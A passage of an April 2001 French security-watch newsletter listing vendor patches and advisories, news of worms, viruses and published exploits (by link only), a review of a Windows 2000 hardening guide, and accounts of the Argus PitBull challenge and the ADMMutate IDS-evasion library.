possible, pour un utilisateur local, de créer un lien symbolique afin de corrompre <strong>cert</strong>ains fichiers suite à une<br />
requête d'impression.<br />
http://www.linuxsecurity.com/advisories/other_advisory-1298.html<br />
http://www.linuxsecurity.com/advisories/caldera_advisory-1299.html<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 33/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
LINUX DEBIAN<br />
Disponibilité de nombreux correctifs<br />
Debian annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:<br />
ntp DSA-045-2<br />
exuberant-ctags DSA-046-2<br />
kernel DSA-047-1<br />
samba DSA-048-2<br />
cfingerd DSA-049-1<br />
sendfile DSA-050-1<br />
http://lists.debian.org/debian-security-announce-01<br />
LINUX MANDRAKE<br />
Disponibilité de nombreux correctifs<br />
Mandrake annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:<br />
vim MDKSA-2000:035 6.0 / 6.1 / 7.1 / 7.2 / CS1.0.1<br />
ntp MDKSA-2000:036 6.0 / 6.1 / 7.1 / 7.2 / CS1.0.1<br />
kernel MDKSA-2000:037 6.0 / 6.1 / 7.1 / 7.2 / CS1.0.1<br />
netscape MDKSA-2000:038 7.1 / 7.2 / CS1.0.1<br />
support 6.x MDKSA-2000:039 6.0 / 6.1<br />
samba MDKSA-2000:040 7.1 / 7.2 / CS1.0.1 / 8.0<br />
http://www.linux-mandrake.com/en/security/2001<br />
LINUX REDHAT<br />
Disponibilité de nombreux correctifs<br />
RedHat annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:<br />
sudo RHSA-2001:019-02 5.2 / 6.2 / 7.0<br />
vim RHSA-2001:008-02 5.2 / 6.2 / 7.0<br />
licq RHSA-2001:022-03 7.0<br />
openssh RHSA-2001:033-04 7.0<br />
kerberos 5 RHSA-2001:025-14 6.2 / 7.0<br />
openssh RHSA-2001:041-02 7.0<br />
pine RHSA-2001:042-02 5.2 / 6.2 / 7.0<br />
ntp RHSA-2001:045-05 5.2 / 6.2 / 7.0<br />
netscape RHSA-2001:046-03 6.2 / 7.0<br />
kernel RHSA-2001:047-03 6.2 / 7.0<br />
http://www.linuxsecurity.com/advisories/<br />
MICROSOFT<br />
Disponibilité du correctif relatif à l'avis MS01-017<br />
Microsoft met à disposition le correctif relatif à l'avis MS01-017 concernant l'émission de faux <strong>cert</strong>ificats Microsoft<br />
par VeriSign. Ce correctif met à jour la liste des révocations afin d'interdire le téléchargements d'éxécutables signés<br />
par de faux <strong>cert</strong>ificats.<br />
http://www.microsoft.com/downloads/release.asp?ReleaseID=28888<br />
MySQL<br />
Disponibilité de 'MySQL' version 3.23.36<br />
MySQL annonce la disponibilité de 'MySQL' version 3.23.36. Cette nouvelle version corrige la vulnérabilité présente<br />
dans 'mysqld' permettant de créer une table dont le nom comporte la séquence '..'.<br />
http://lists.mysql.com/cgi-ez/ezmlm-cgi?2:mss:91:200103:lhhbldgdkhpiccnallka<br />
NetBSD<br />
Disponibilité des correctifs pour 'ftpd'<br />
NetBSD met à disposition les correctifs contre la vulnérabilité affectant le démon ftp 'ftpd'. Il était possible de<br />
provoquer à distance un débordement de buffer afin d'exécuter de code à distance et d'obtentir des privilèges<br />
'root'. NetBSD 'ftpd' [2001-005]<br />
http://www.linuxsecurity.com/advisories/netbsd_advisory-1275.html<br />
ftp://ftp.netbsd.org/pub/NetBSD/misc/security/advisories/NetBSD-SA2001-005.txt.asc<br />
NIPC<br />
Reprise de l'avis MS01-17<br />
Le NIPC publie, sous la référence 01-006, un bulletin venant compléter les bulletins émis par le CERT (CA-2001-04)<br />
et Microsoft (MS01-17) concernant l'usurpation d'identité ayant conduit à la délivrance de 2 <strong>cert</strong>ificats Verisign .<br />
http://www.nipc.gov/warnings/advisories/2001/01-006.htm<br />
Reprise de l'avis émis par le SANS portant sur 'LION'<br />
Le NIPC publie, sous la référence 01-005, un bulletin venant compléter l'alerte émise par le SANS Institute<br />
annonçant l'activité du vers 'LION'. Rappelons à ce sujet que 20% des serveurs DNS connectés sur l'Internet sont<br />
probablement vulnérables à l'attaque utilisée.<br />
http://www.nipc.gov/warnings/advisories/2001/01-005.htm<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 34/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
OpenBSD<br />
Disponibilité des correctifs pour 'ftpd'<br />
OpenBSD annonce la disponibilité des correctifs contre la vulnérabilité affectant le démon ftp 'ftpd' permettant de<br />
provoquer à distance un débordement de buffer.<br />
http://www.openbsd.org/errata.html#globftp://ftp.openbsd.org/pub/OpenBSD/patches/2.8/common/025_glob.patch<br />
SCO<br />
Disponibilité des correctifs pour 'ntpd'<br />
SCO annonce la disponibilités des correctifs pour 'ntpd'. Une vulnérabilité de type débordement de buffer affectait le<br />
démon 'ntpd' des systèmes SCO OpenServer 5 et UnixWare 7.1<br />
ftp://ftp.sco.com/SSE/sse073.ltr (UnixWare 7.1.0 et 7.1.1)<br />
ftp://ftp.sco.com/SSE/sse074.ltr (OpenServer 5)<br />
SGI<br />
Disponibilité des correctifs 'BIND' pour IRIX<br />
SGI annonce la disponibilité des correctifs 'BIND' pour IRIX. Les versions affectées s'étendent de la 6.5 à la 6.5.11<br />
incluses. Plusieurs vulnérabilités critiques permettaient d'obtenir un accès 'root' distant. Il est impératif de mettre à<br />
jour tous les systèmes vulnérables. ftp://patches.sgi.com/support/free/security/advisories/20010401-01-P<br />
http://www.securityfocus.com/archive/1/177664<br />
VIRUS<br />
'Winux' un virus multi-plateforme<br />
'Winux' est un virus créé par un Tchèque, qui, comme son nom l'indique s'attaque à la fois à Windows et à Linux. Il<br />
n'est pas destructif et se propage en vérifiant si les fichiers à infecter sont des exécutables Windows (format PE) ou<br />
Linux (format ELF) et utilise un code dédié en fonction de la plate-forme. Il s'agit là d'une idée très ingénieuse,<br />
malheureusement mise à mauvais profit qu'est le virus informatique.<br />
http://solutions.journaldunet.com/0103/010329vers.shtml<br />
http://www.wired.com/news/technology/0,1282,42672,00.html<br />
http://www.sophos.com/virusinfo/articles/lindose.html<br />
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=PE_LINDOSE.A<br />
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=ELF_LINDOSE.A<br />
http://www.sophos.com/virusinfo/analyses/w32lindose.html<br />
CODES D'EXPLOITATION<br />
Les codes d'exploitation des vulnérabilités suivantes ont fait l'objet d'une large diffusion:<br />
FTP<br />
Code d'exploitation contre la vulnérabilité 'glob()'<br />
Deux code d'exploitation contre la vulnérabilité 'glob()' des démons 'ftpd' ont été diffusés sur la liste Butraq. L'un,<br />
écrit en Perl est destiné aux plateformes FreeBSD. L'autre, écrit en langage C est destiné aux plateformes<br />
OpenBSD.<br />
http://www.securityfocus.com/archive/1/176917<br />
MICROSOFT<br />
Code d'exploitation contre les serveurs 'ISA'<br />
SecureXpert Labs propose un code d'exploitation contre la vulnérabilité affectant les serveurs 'ISA'. Ce serveur<br />
était vulnérable à distance à une attaque de type déni de service. C'est à 'SecureXpert Labs' que Microsoft doit la<br />
découverte de cette vulnérabilité.<br />
http://www.securityfocus.com/archive/1/176912<br />
Code d'exploitation contre la vulnérabilité MS01-020<br />
Un code d'exploitation contre la vulnérabilité décrite dans le bulletin Microsoft MS01-020 vient d'être publié. Une<br />
faille dans 'Internet Explorer' permettait d'exécuter du code à distance en soumettant un type MIME d'un courrier<br />
électronique ne correspondant pas au type de l'attachement fourni.<br />
http://www.finjan.com/attack_release_detail.cfm?attack_release_id=49<br />
http://www.finjan.com/mcrc/cuartango.cfm<br />
http://www.kriptopolis.com/cua/eml.html<br />
BULLETINS ET NOTES<br />
Les bulletins d’information suivants ont été publiés par les organismes officiels de surveillance et les<br />
éditeurs:<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 35/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
AXENT/SYMANTEC<br />
Détection du virus 'lion' par les produits Symantec<br />
Symantec annonce que la suite de ses produits IDS et antivirus est en mesure de détecter la présence et l'activité<br />
du virus 'lion'. Par ailleurs, nous vous recommandons la lecture de l'avis du SANS continuellement mis à jour<br />
('http://www.sans.org/y2k/lion.htm').<br />
http://www2.axent.com/swat/index.cfm?Doc=2001_03_26b<br />
Mise à jour pour 'ESM' (Enterprise Security Manager)<br />
Axent/Symantec a publié la 'Security Update 7' pour son produit ESM. Cette mise à jour intègre de nouvelles<br />
fonctionnalités pour Windows et pour de nombreux modules Unix (intégrité des comptes et du réseau, paramètres<br />
d'authentification...).<br />
http://www2.axent.com/swat/index.cfm?Doc=2001_04_05<br />
Mise à jour 'SU4' pour 'Net Prowler 3.5.1'<br />
Axent/Symantec a publié la 'Security Update 4' pour son produit NetProwler. Cette mise à jour intègre de nouvelles<br />
signatures permettant la détection de caractères d'échappement, de remontée de répertoire, d'exploitation de<br />
vulnérabilités CGI et de débordement de buffer des serveurs FTP. Il renforce aussi la signature 'Stacheldraht' déjà<br />
présente. En somme, 22 nouvelles signatures viennent s'ajouter grâce à la mise à jour 'NetProwler 3.5.1 SU4'.<br />
http://www2.axent.com/swat/index.cfm?Doc=2001_04_06<br />
Note au sujet des faux <strong>cert</strong>ificats Microsoft<br />
Symantec publie une note d'information au sujet des faux <strong>cert</strong>ificats Microsoft émis par VeriSign. Cette note fournit<br />
les recommandations d'usage afin de ne pas risquer de télécharger d'exécutables signés avec de faux <strong>cert</strong>ificats.<br />
http://www.symantec.com/avcenter/sirc/fraudulent.digital.<strong>cert</strong>ificate.html<br />
CERT<br />
Rapport annuel du CERT sur l'année 2000<br />
Le CERT publie un rapport sur les incidents majeurs de l'année 2000 en matière de sécurité informatique. Dénis de<br />
service, vulnérabilités 'BIND', 'FTP' et 'rpc.statd', contrôles 'ActiveX' et virus y sont sommairement décrits et mis en<br />
relation aux alertes associées.<br />
http://www.<strong>cert</strong>.org/annual_rpts/<strong>cert</strong>_rpt_00.html<br />
Vulnérabilité Sun 'snmpXdmid' largement exploitée<br />
Le CERT publie, sous la référence CA-2001-05, un bulletin d'alerte au sujet de la vulnérabilité 'snmpXdmid' sous<br />
Sun Solaris 2.6, 7 et 8. Il reporte en effet qu'un grand nombre de sites ont été attaqués et fournit ainsi les indices<br />
permettant de détecter si un système a été compromis. Le bulletin est aussi disponible via FedCIRC sous la<br />
référence FA-2001-05<br />
http://www.<strong>cert</strong>.org/advisories/CA-2001-05.html<br />
http://www2.fedcirc.gov/advisories/FA-2001-05.html<br />
Exploitation des vulnérabilités 'BIND'<br />
Le CERT publie, sous la référence IN-2001-03, une note recensant les différentes exploitations des vulnérabilités de<br />
'BIND'. Elle permet de reconnaître un système infecté par un toolkit ou un ver exploitant une des failles.<br />
http://www.<strong>cert</strong>.org/incident_notes/IN-2001-03.html<br />
CIAC<br />
Récapitulatif des systèmes dont 'ntpd' est vulnérable<br />
Le CIAC publie, sous la référence L-071, un récapitulatif des systèmes dont le démon 'ntpd' est vulnérable. Les<br />
risques encourus sont critiques et peuvent mener un utilisateur distant à un déni de service, l'exécution de code<br />
distant, voire l'obtention d'un accès 'root' distant si la faille n'est pas corrigée.<br />
http://ciac.llnl.gov/ciac/bulletins/l-071.shtml<br />
IETF<br />
Faille de sécurité dans le protocole 'mobile IPv6'<br />
Le protocole 'Mobile IPv6' destiné à être utilisé dans les technologies 'sans-fils' apparait être moins sûr que prévu.<br />
Une vulnérabilité de conception dans l'un des mécanismes de sécurité pourrait amener le groupe de travail de l'IETF<br />
à revoir sa copie retardant ainsi sa mise en service. Aucune précision n'est disponible concernant cette vulnérabilité<br />
mais il semble qu'elle réside dans l'utilisation d'une adresse IPv6 en tant qu'élément fondamental de<br />
l'authentification du mobile, élement négocié lors du changement de zône du mobile par le biais de messages de<br />
mise à jour (Binding updates). La sécurité de ces messages est assurée par un mécanisme spécifique qui serait<br />
hélas susceptible d'une attaque de type 'Man-In-The-Middle'.<br />
http://www.idg.net/ic_497484_1794_9-10000.html<br />
ISC/BIND<br />
Disponibilité de BIND version 9.1.1<br />
L'ISC annonce la disponibilité de la version stable de BIND 9.1.1. Cette nouvelle version n'apporte aucune nouvelle<br />
fonctionnalité mais en revanche corrige de nombreuses vulnérabilités dont 'TSIG' qui a été exploitée par le ver<br />
'lion'.<br />
http://www.isc.org/products/BIND/bind9.html<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 36/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
LINUX REDHAT<br />
Annonce de la nouvelle version de Red Hat 7.1 (seawolf)<br />
Red Hat annonce sa nouvelle version du système d'exploitation Linux. La version 7.1 (seawolf) inclut de<br />
nombreuses améliorations et renforce la sécurité du système. Plusieurs outils de configuration ont été ajoutés.<br />
http://www.redhat.com/products/software/linux/rhl_new_features.html<br />
McAFEE<br />
Faux <strong>cert</strong>ificats VeriSign détectés par antivirus<br />
McAFEE propose une signature pour son antivirus permettant de détecter les faux <strong>cert</strong>ificats VeriSign. Il est en<br />
effet très astucieux d'utiliser cette méthode, le <strong>cert</strong>ificat pouvant s'apparenter à un virus par sa signature.<br />
http://vil.nai.com/vil/virusSummary.asp?virus_k=99058<br />
MICROSOFT<br />
Outil de recherche par 'produit/service pack'<br />
Le site de Microsoft propose un nouvel outil en ligne permettant de connaître tous les bulletins liés à un produit et<br />
un service pack donnés. Il est ainsi possible recenser l'ensemble des correctifs appartenant à un service pack tout<br />
en ciblant le système utilisé.<br />
http://www.microsoft.com/technet/security/current.asp<br />
Décalage horaire dans <strong>cert</strong>aines applications Microsoft<br />
Il semble qu'à partir du premier avril 2001, <strong>cert</strong>aines applications soient susceptibles de renvoyer une heure<br />
incorrecte dans diverse routines C++, malgré un affichage correct de l'horloge. D'après Bugtraq, le problème en<br />
question durera jusqu'au 8 avril 2001. Il ne semble pas que cette annonce soit un poisson d'avril, un document<br />
officiel de Microsoft ayant été publié.<br />
http://msdn.microsoft.com/visualc/headlines/2001.asphttp://www.securityfocus.com/archive/1/172205<br />
SANS<br />
Nouvel outil de déni de service distribué 'CARKO'<br />
Le SANS vient d'être informé de l'existence d'un nouvel outil de déni de service distribué (DDoS) appelé 'CARKO'. Il<br />
s'agirait d'une variante de 'Stacheldraht'. Les systèmes d'exploitation de Sun seraient ciblés. Le contenu du lien<br />
fourni est susceptible d'évoluer.<br />
http://www.sans.org/current.htm<br />
Note d'information sur ADORE<br />
Le GIAC publie une note annoncant la disponibilité de l'outil 'adorefind' destiné à détecter la compromission d'un<br />
système LINUX par un vers dénommé 'adore' par le SANS. Notons que l'utilisation de ce nom porte à confusion, un<br />
'rootkit' du même nom étant diffusé sur l'Internet depuis plus de 6 mois par le groupe TESO. En pratique, la note<br />
du GIAC décrit ce qu'il convient d'appeler un 'autorooter', c'est à dire un script permettant l'automatisation de<br />
l'installation d'un 'rootkit'. Bien entendu, un tel script peut être très rapidement adapté pour installer un autre<br />
'rootkit' que celui initialement prévu. La découverte de ce nouvel avatar de 'ramen' confirme les risques de diffusion<br />
rapide de nouveaux 'rootkit' par le biais du la même technique d'installation. A ce jour, une quarantaine de 'rootkit'<br />
ont été inventoriés... Est-il nécessaire de rappeler l'urgence de l'installation des versions immunes de 'statd',<br />
'lprNG', 'bind', 'wu-ftpd' et de tout autre service vulnérable accessible depuis l'Internet.<br />
http://www.sans.org/y2k/adore.htm<br />
VERS LION<br />
Analyse détaillée du ver 'lion'<br />
Le site 'whitehats' propose une analyse extrêmement fournie du ver 'lion'. Cette analyse détaille comment et<br />
pourquoi 'lion' a été conçu puis aborde la partie technique en décomposant les cycles d'infection et de propagation<br />
des différentes versions du ver. Plusieurs liens et explications aident à la prévention à la fois sur un système et un<br />
réseau local. Les scripts originaux du virus sont aussi proposés.<br />
http://www.whitehats.com/library/worms/lion/index.html<br />
VIGILANTe<br />
Annonce de fusion entre VIGILANTe et Networks Vigilance<br />
Networks Vigilance, et VIGILANTe, deux sociétés spécialisée dans les outils et services dans le domaine des réseaux<br />
et de la sécurité annoncent leur fusion. Ce rapprochement renforce l'intérêt que les multinationales comme<br />
'VIGILANTe', Dano-Américaine, portent aux entreprises Françaises telles que 'Networks Vigilance'.<br />
http://www.vigilante.com/press/releases/nv_merger.htm<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 37/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
ATTAQUES<br />
OUTILS<br />
HARDENING WINDOWS 2000<br />
Description<br />
Le document 'Hardening Windows 2000', proposé par Philip Cox, est extrait du livre 'Windows 2000 Security<br />
Handbook' édité chez Osborne/McGraw-Hill. La partie présentée a pour vocation de guider l’utilisateur vers une<br />
méthode de sécurisation des systèmes d’exploitation Windows 2000 Server, et par extension Windows 2000<br />
Professional.<br />
La stratégie retenue afin d’optimiser le processus de sécurisation est basée sur un principe simple et pour le moins<br />
efficace. S’il fallait résumer celui-ci, il affirmerait que «tout ce qui n'est pas utile au système est inutile au<br />
système».<br />
A première lecture, cette observation peut paraître naïve, cependant il est facile constater qu’un grand nombre<br />
d’attaques ont pour cible des services additionnels, souvent installés par défaut. En effet, on enregistre tous les jours<br />
l’apparition de nouvelles vulnérabilités. Celles-ci affectent des applications ou services pour la plupart inutilisés. Ceuxci<br />
constituent donc, potentiellement, un danger réel. Une politique paranoïaque se révèle souvent plus efficace que<br />
tout autre.<br />
Le document se place donc dans un contexte où les systèmes sont exposés à un environnement hostile, et se<br />
prémunir consiste ici à présenter le minimum de faiblesses afin d’être le moins vulnérable. Tout service, application,<br />
couche ou protocole est un talon d’Achille pour le système et les segments de réseau qui l’entourent.<br />
Le document se pose donc comme un guide de sécurisation dans le cadre de l’installation d’un système d’exploitation<br />
Windows 2000. La majorité des recommandations traite principalement de problèmes de configuration. Cependant<br />
l’étendue des domaines couverts est très vaste et celle-ci reflète parfaitement les dangers qu’un administrateur<br />
réseau pourrait rencontrer dans le contexte décrit. De plus, l’auteur rappelle que bon nombre de paramètres ne sont<br />
pas décrits, voire simplement documentés, ce qui rend la tâche encore plus difficile.<br />
Ainsi ce guide décrit en détails la marche à suivre afin d’obtenir le système le plus fiable possible. Les domaines<br />
suivants sont en grande partie développés :<br />
- Installation minimale du système<br />
- Renforcement du système par désactivation ou désinstallation des services inutilisés et des applications<br />
dépendantes<br />
- Reconfiguration de Syskey afin d’empêcher les attaques sur la base SAM (Security Account Manager)<br />
- Mise en place d’une politique de sécurité fiable sur les droits, comptes, mots de passe et options de sécurité des<br />
utilisateurs<br />
- Suppression 'physique' des services afin de consacrer une machine par service<br />
- Filtrage et renforcement des connexions TCP/IP et mise en place d’IPSec<br />
- Installation des correctifs (ou Service Packs)<br />
- Protection des binaires sensibles<br />
- Restriction des droits détenus par l’utilisateur anonyme<br />
Cette liste reflète la plupart des oublis ou écueils. En effet, l’administrateur réseau, ou tout autre utilisateur désireux<br />
d’installer un système fiable et sécurisé semble se focaliser sur la protection. Ainsi, l’utilisation d’EFS (Encrypting File<br />
Système) afin de chiffrer les données sensibles, l’installation de logiciel vérifiant l’intégrité du système tel que Tripwire<br />
ne seront jamais négligés au détriment des directives rappelées ci-dessus.<br />
Si l’on s’intéresse aux bulletins Microsoft ayant recensé une vulnérabilité dans le système d’exploitation<br />
Windows 2000 Server ou Professional, on obtient le tableau suivant:<br />
Bulletin Titre S P Origine de la vulnérabilité Evitable<br />
MS01-022 WebDAV Service Provider Can Allow Scripts to Levy X X Composant accédant aux Oui<br />
Requests as User<br />
ressources ‘WebDAV’ (msdaipp.dll)<br />
MS01-017 Erroneous VeriSign-Issued Digital Certificates Pose X X Falsification de <strong>cert</strong>ificats Non<br />
MS01-013<br />
Spoofing Hazard<br />
Windows 2000 Event Viewer Contains Unchecked Buffer X X Visualiseur d’évènements Non<br />
MS01-011 Malformed Request to Domain Controller Can Cause CPU X Service utilisé par le contrôleur de<br />
Exhaustion<br />
domaines<br />
MS01-007 Network DDE Agent Requests Can Enable Code to Run in<br />
System Context<br />
X X Network DDE Oui<br />
MS01-006 Invalid RDP Data Can Cause Terminal Server Failure X Protocole RDP Oui<br />
MS01-005 Packaging Anomaly Could Cause Hotfixes to be Removed X X Catalogue système Non<br />
MS01-001 Web Client Will Perform NTLM Authentication Regardless<br />
of Security Settings<br />
X X ‘Web Extender Client’ Oui<br />
MS00-099 Directory Service Restore Mode Password Vulnerability X Outil ‘Configure your server’ Oui (3)<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 38/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE<br />
Non (1)
Avril 2001<br />
MS00-098 Indexing Service File Enumeration Vulnerability X X Service d’indexation Oui<br />
MS00-096 SNMP Parameters Vulnerability X X Base de registre Non<br />
MS00-089 Domain Account Lockout Vulnerability X X Implémentation de NTML Oui (3)<br />
MS00-085 ActiveX Parameter Validation Vulnerability X X Contrôle ActiveX Oui<br />
MS00-084 Indexing Services Cross Site Scripting Vulnerability X X Service d’indexation Oui<br />
MS00-083 Netmon Protocol Parsing Vulnerability X Analyseur de protocole Oui<br />
MS00-081 New Variant of VM File Reading Vulnerability X X Machine Virtuelle Java Oui<br />
MS00-077 NetMeeting Desktop Sharing Vulnerability X X NetMeeting Oui<br />
MS00-070 Multiple LPC and LPC Ports Vulnerabilities X X Mécanisme de gestion des LPC Oui<br />
MS00-069 Simplified Chinese IME State Recognition Vulnerability X X Gestionnaire ‘IME’ (Input Method<br />
Editor)<br />
Oui<br />
MS00-067 Windows 2000 Telnet Client NTLM Authentication X X Authentification NTLM via Telnet Oui<br />
Vulnerability<br />
(2)<br />
MS00-066 Malformed RPC Packet Vulnerability X X Service RPC Oui<br />
MS00-065 Still Image Service Privilege Escalation Vulnerability X X Service ‘Still Image’ Oui<br />
MS00-062 Local Security Policy Corruption Vulnerability X X Service RPC Oui<br />
MS00-059 Java VM Applet Vulnerability X X Machine Virtuelle Java Oui<br />
MS00-053 Service Control Manager Named Pipe Impersonation<br />
Vulnerability<br />
X X ‘Service Control Manager’ Non (1)<br />
MS00-052 Relative Shell Path Vulnerability X X Séquence de démarrage Non<br />
MS00-050 Telnet Server Flooding Vulnerability X X Serveur Telnet Oui<br />
MS00-047 NetBIOS Name Server Protocol Spoofing Vulnerability X X Protocole NetBios Non<br />
MS00-037 HTML Help File Code Execution Vulnerability X X VBS ‘Windows.showHelp()’ et objet<br />
‘HHCtrl’<br />
Oui<br />
MS00-036 ResetBrowser Frame and Host Announcement Frame<br />
Vulnerabilities<br />
X X Service ‘Computer Browser’ Oui<br />
MS00-032 Protected Store Key Length Vulnerability X X API de cryptographie Non<br />
MS00-029 IP Fragment Reassembly Vulnerability X X Pile réseau Non<br />
MS00-027 Malformed Environment Variable Vulnerability X X Interpréteur<br />
‘cmd.exe’<br />
de commande Oui<br />
MS00-026 Mixed Object Access Vulnerability X Active Directory Non (1)<br />
MS00-021 Malformed TCP/IP Print Request vulnerability X X Service d’impression TCP/IP Oui<br />
MS00-020 Desktop Separation Vulnerability X X Mécanisme de cloisonnement des<br />
processus<br />
Non<br />
MS00-011 VM File Reading Vulnerability X X Machine Virtuelle Java Oui<br />
MS00-006 Malformed Hit-Highlighting Argument Vulnerability X X Service d'indexation Oui<br />
Légendes S: W2K Serveur<br />
P: W2K Professional<br />
Evitable: Vulnérabilité pouvant être évitée/éliminée/parée en appliquant les directives du guide<br />
Renvois: (1) L’origine de la vulnérabilité est inhérente au système<br />
(2) Possible en désactivant l’option d’authentification NTLM sur les clients Telnet<br />
(3) Problème de configuration<br />
Il est intéressant de constater que sur les 38 vulnérabilités émises, plus des deux tiers auraient pu être<br />
évitées. Celles-ci correspondant à une faille contenue dans un service ou application tel que WebDAV ou la Machine<br />
Virtuelle Java (JVM).<br />
Nombre de bulletins Microsoft Windows 2000 Server / Professional 38 100 %<br />
Vulnérabilités évitables 26 68 %<br />
Vulnérabilités non-évitables 12 32 %<br />
Windows 2000 n’est cependant pas le seul système à souffrir de la négligence des utilisateurs. Il est très facile de<br />
faire le parallèle avec d’autres systèmes d’exploitation tel que Linux. On se souvient en effet de la vulnérabilité<br />
affectant le service 'LPRng'. Ce service, utilisé lors de requêtes d’impression, possède une fonction vulnérable, à<br />
savoir syslog(). Le problème est que ce service reste activé sur la plupart des systèmes reliés à l’Internet conduisant<br />
à une faille exploitable depuis le monde extérieur.<br />
En résumé, ce guide, même s’il est exclusivement orienté Windows 2000 pourrait, dans les grandes lignes,<br />
satisfaire tout type de système. Seules les options de configuration devront être adaptées à chaque environnement.<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 39/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
C’est probablement pour cette raison que ce document restera une référence dans l’art et la manière de sécuriser (ou<br />
plus exactement renforcer) un système d’exploitation Windows 2000.<br />
Complément d'information<br />
http://www.systemexperts/com/win2k.shtml<br />
http://www.systemexperts.com/win2k/hardenW2K11.pdf<br />
TECHNIQUES<br />
CHALLENGE ARGUS SYSTEMS<br />
Description<br />
Le 5 ième défi initié par la société Argus Systems concernant son logiciel d'isolation 'PitBull' a été remporté par un<br />
groupe de 4 hackers Polonais. Dans son communiqué de presse, et contrairement aux habitudes, Argus fait le<br />
panégyrique du 'professionnalisme' ce groupe portant le doux nom de LSD, acronyme bien connu de … Last Stage of<br />
Delirium …<br />
Dans les faits, la lecture de ce communiqué de presse est d'autant plus intéressante que le rapport écrit par LSD,<br />
détaillant les principes mis en œuvre, n'est pas publiquement accessible pour des raisons déontologiques. L'analyse<br />
des événements à l'origine du succès de l'attaque menée par LSD proposée par Argus Systems est cependant<br />
suffisamment détaillée pour déterminer la vulnérabilité exploitée !<br />
As a conscientious member of the security community, Argus owes a professional obligation to operating<br />
system vendors supporting the Intel x86 architecture - the most widely-deployed system architecture in the<br />
world. Via the LSD exploit, Argus has become aware of the vulnerability in the architecture and must notify<br />
system vendors and afford them an opportunity to take corrective action if necessary prior to Argus releasing<br />
the details of this exploit. Complete details will be delivered to the public domain as soon as our professional<br />
obligations have been satisfied.<br />
Notons qu'Argus Systems utilise ce communiqué pour exposer sa doctrine largement inspirée par le rapport 'The<br />
Inevitability of Failure: The Flawed Assumption of Security in Modern Computing Environments' déjà mentionné à<br />
propos de 'LINUX SE'.<br />
This successful exploit is concrete and dramatic validation of the message we have been trying to deliver to the<br />
market, namely: operating system security is absolutely mandatory in today's environment. Users<br />
cannot even dream of securing their sites without immediate and appropriate consideration of<br />
operating system security.<br />
Le défi lancé mi-avril consistait à acquérir des privilèges autres que ceux accordés au titulaire d'un compte licite. A<br />
cette fin, un <strong>cert</strong>ain nombre de comptes libres d'accès ont été ouverts par Argus sur un système Solaris x86<br />
sécurisé par PitBull.<br />
En pratique, pour remporter ce défi, LSD a dû contourner la protection apportée par PitBull en attaquant au plus bas<br />
niveau, c'est à dire celui de la gestion de l'architecture du processeur INTEL par le noyau du système d'exploitation<br />
Solaris.<br />
Il semble que LSD ait adapté son attaque pour tirer parti d'un problème 'subtil' dans la gestion des descripteurs de<br />
contexte LDT (Local Data Table), problème ayant fait l'objet d'une alerte en environnement NetBSD.<br />
A subtle bug in validation of user-supplied arguments to a syscall can allow allow user applications on the i386<br />
platform to transfer control to arbitrary addresses in kernel memory, bypassing normal system protections.<br />
Il s'agit probablement de l'alerte 'x86 USER_LDT validation' publiée en février 2001. Cette alerte n'a jamais fait l'objet<br />
d'une reprise dans un environnement autre que NetBSD et pourtant LSD vient de démontrer qu'au moins un autre<br />
système est vulnérable …<br />
Complément d'information<br />
http://www.argus-systems.com/events/infosec/#Rules<br />
http://www.lsd-pl.net/aboutus.html<br />
http://www.linuxsecurity.com/advisories/netbsd_advisory-1157.html<br />
ADMMUTATE <br />
Description<br />
L'annonce, en début de mois, de la disponibilité d'un outil permettant d'échapper aux mécanismes de détection<br />
d'intrusion (IDS) a fait l'effet d'une bombe dans la presse spécialisée provoquant une réponse 'laconique', voire<br />
'fallacieuse', de la part de <strong>cert</strong>ains éditeurs.<br />
Le coupable est 'ADMMutate', une librairie développée par un hacker canadien, connu sous le pseudonyme de K2<br />
(du nom d'un célèbre sommet de l'himalaya), membre du groupe ADM, groupe à l'origine de nombreux outils<br />
d'attaques 'remarquables' dont le vers ADMw0rm (Mars 1999).<br />
En pratique, 'ADMMutate' exploite une faiblesse inhérente à la génération actuelle des systèmes de détection<br />
d'intrusion: l'utilisation d'une stratégie basée sur la recherche d'une signature connue et invariante. A ce titre,<br />
et sans vouloir encenser la communauté des hackers, force est de constater que la polémique déclenchée autour de<br />
cet 'outil' aura permis de faire prendre conscience des limitations des produits d'IDS. Il est fort probable que de<br />
nouvelles stratégies d'analyses soient rapidement intégrées dans ces produits, reproduisant le phénomène constaté il<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 40/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
y a quelques années avec les produits anti-virus.<br />
